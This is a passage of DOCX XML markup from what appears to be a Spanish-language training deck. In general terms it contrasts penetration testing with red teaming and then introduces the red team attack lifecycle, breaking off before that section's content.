                            <w:spacing w:val="-10"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n vs Red Teaming</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Un ataque contra un host, una red o cualquier aplicación para medir e identificar los riesgos asociados con la explotación de un entorno objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B9892" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389E05B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1826"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1826" w:right="1314" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Más énfasis en la reducción de las vulnerabilidades expuestas, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F1B79" w14:textId="1678E258" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E" w:rsidP="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1154"/>
        </w:tabs>
        <w:spacing w:before="181" w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1154" w:right="1611" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Proceso de uso de tácticas del mundo real, técnicas empleadas por actores de amenazas que tienen como objetivos medir la efectividad de las personas, tecnologías, etc. utilizadas para defender un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>entorno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1DC447" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1154"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1154" w:right="2341" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Más énfasis en la capacitación y la medición de riesgos y capacidades de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>defensa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>una</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>organización</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFB108" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="560" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="9032" w:space="40"/>
            <w:col w:w="10128"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F37668F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="571" w:lineRule="exact"/>
        <w:ind w:left="3479"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pruebas de penetración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B664FF2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="192"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F15C225" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1821"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1821" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El alcance es limitado: de 1 a 2 sistemas o redes específicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C5C701" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="250"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7048BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1821"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1821" w:right="366" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Hace suposiciones sobre el medio ambiente, es posible que no pruebe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A2FFD5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="567" w:lineRule="exact"/>
        <w:ind w:left="1821"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>donde no se le dice que vaya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3D5650" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1824FCED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E07DCF9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="328"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB5243B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1821"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1821" w:right="167" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Utiliza las herramientas presentes en ese momento durante las pruebas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363BDB3A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="571" w:lineRule="exact"/>
        <w:ind w:right="584"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Equipo Rojo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31561A36" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="192"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3850CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1165"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1165" w:right="2130" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Parte específica de (o la totalidad) de la organización</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E809161" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="250"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655605F6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1165"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1165" w:right="1671" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>No hace suposiciones; intentos de compromiso en todas partes; Pivota y cambia la estrategia, las técnicas si es necesario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F9266" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="241"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C101957" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1165"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1165" w:right="1506" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Investigar constantemente nuevos exploits, vulnerabilidades e implementar ataques con nuevas herramientas tan pronto como se descubran.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A8E09F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1060" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="9020" w:space="40"/>
            <w:col w:w="10140"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BDE836"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3760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="607E6985" wp14:editId="6D5F62E6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1434662"/>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434662"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1434662"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="29" name="Graphic 29"/>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30" name="Textbox 30"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1434662"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="04C559BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="271"/>
                                <w:ind w:left="4152"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="56"/>
                                  <w:szCs w:val="56"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="007A7B84">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="56"/>
                                  <w:szCs w:val="56"/>
                                </w:rPr>
                                <w:t>1.2 Ciclo de vida de ataque del Equipo Rojo</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
                <wp14:sizeRelV relativeFrom="margin">
                  <wp14:pctHeight>0</wp14:pctHeight>
                </wp14:sizeRelV>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="607E6985" id="Group 28" o:spid="_x0000_s1043" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:112.95pt;z-index:15733760;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-height-relative:margin" coordsize="121920,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">
                <v:shape id="Graphic 29" o:spid="_x0000_s1044"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 30" o:spid="_x0000_s1045" type="#_x0000_t202" style="position:absolute;width:121920;height:1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4C559BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="271"/>
                          <w:ind w:left="4152"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="56"/>
                            <w:szCs w:val="56"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="007A7B84">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="56"/>
                            <w:szCs w:val="56"/>
                          </w:rPr>
                          <w:t>1.2 Ciclo de vida de ataque del Equipo Rojo</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="35823F27" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BD90CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C55E176" w14:textId="77777777" w:rsidR="007A7B84" w:rsidRDefault="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1343"/>
        </w:tabs>
        <w:ind w:left="1343" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636946A4" w14:textId="688925C9" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1343"/>
        </w:tabs>
        <w:ind w:left="1343" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487592448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4200A2BD" wp14:editId="6F7E8627">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1812005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>813917</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7362679" cy="3017519"/>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7362679" cy="3017519"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007F001E" w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F001E" w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>continuación</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F001E" w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F001E" w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>muestra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F001E" w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F001E" w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>una</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F001E" w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
